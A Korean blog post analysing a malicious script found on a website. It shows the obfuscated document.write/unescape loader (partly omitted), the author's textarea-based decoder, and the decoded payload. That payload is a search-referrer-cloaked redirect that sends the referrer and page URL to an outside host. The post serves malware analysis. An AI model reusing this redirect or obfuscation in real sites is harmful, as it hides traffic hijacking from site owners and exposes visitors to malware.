
security/악성코드 유포

우연히 발견한 악성스크립트 !

원본 위치 : http://kjclsb.buy3d.co.kr/style.css.js


// Captured sample as quoted by the author; [생략] marks parts the author omitted.
// Stage 1: document.write() injects a %XX-escaped block. Its visible start decodes to
//   <script language="javascr
// and its visible end decodes to
//   h-1,1));document.write(unescape(t));}
// followed by the closing script tag, i.e. a decoder that writes its output straight
// into the page, where the browser parses and runs it.
// NOTE(review): the omitted middle presumably holds the definition of dF() - confirm against the full sample.
// Stage 2: dF() receives a payload whose last character ('1') is the shift key; "%26" is an escaped "&".
document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%[생략]68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%2631mbohvbhf[생략]%60vs%264C%261E%261B%264D0tdsjqu%264F1')


<html>

<head>

</head>

<body>

<textarea rows="200" cols = "100" id='df'></textarea>

<script language=javascript>

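/**
 * Analysis-only decoder: reverses the sample's shift obfuscation and shows the
 * result as plain text in the textarea with id "df".
 *
 * The last character of `s` is the shift key and everything before it is the
 * payload. The payload is unescape()d, every character code is lowered by the
 * key, and the shifted string is unescape()d once more.
 *
 * The decoded text is assigned to the textarea's `value`, so it is displayed
 * and never parsed as markup or executed.
 *
 * @param {string} s - Encoded payload followed by a one-character numeric key.
 */
function dF(s)
{
  // Number() performs the same coercion the original `charCode - "1"` relied on.
  var key = Number(s.slice(-1));
  var shifted = unescape(s.slice(0, -1));
  var t = '';

  // The counter is declared locally: a bare `i` creates an implicit global and
  // throws a ReferenceError in strict or module code.
  for (var i = 0; i < shifted.length; i++) {
    t += String.fromCharCode(shifted.charCodeAt(i) - key);
  }

  // unescape() is kept on purpose: the sample is encoded for it, whereas
  // decodeURIComponent() reads %XX as UTF-8 and throws on malformed sequences.
  document.getElementById('df').value = unescape(t);
}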

 dF('&4Dtdsjqu&31mbohvbhf&4E[생략]8D&8D&310ebvn0/uftu&39x``us&3:&31&8D&8D&310hpphmf0/uftu&39x``us&3:&3:&31mpdbujpo/isfg&4E&31x``vs&4C&1E&1B&4D0tdsjqu&4F1');

</script>


디코딩!


<script language="JavaScript">

// Decoded second stage (specimen, kept as decoded): a referrer-conditional redirect.

// URL-encoded referrer of the current page view.
var w__tr=encodeURIComponent(document.referrer);

// URL-encoded address of the page that loaded this script.
var w__hr=encodeURIComponent(location.href);

// Redirect target: referrer and page address are handed to the remote host as query parameters.
var w__ur="http://nayas.cafe24.com/?r=" + w__tr + "&refe=" + w__hr;

// The redirect fires only when the referrer contains one of these search-portal names.
// NOTE(review): presumably this keeps the redirect hidden from people who open the site directly
// (owner, admin). When checking a site for this, fetch the page with and without a
// search-engine Referer header and compare the results.
if(/naver/.test(w__tr) || /nate/.test(w__tr)  || /yahoo/.test(w__tr)  || /daum/.test(w__tr) || /google/.test(w__tr)) location.href= w__ur;

</script>


textarea 태그를 이용하는 방법도 괜찮은 거 같다! document.write 대신 textarea의 value에 넣으면 디코딩된 스크립트가 실행되지 않고 텍스트로만 보인다. 다양한 방법을 연구해봐야겠다!!!!

몇번 안해봐서 꽤 걸린거 같은데 구글도 찾아보고 네이버도 찾아봐서 이렇게 나오니 뿌듯하다!

document.getElementById 이것이 나의 구세주!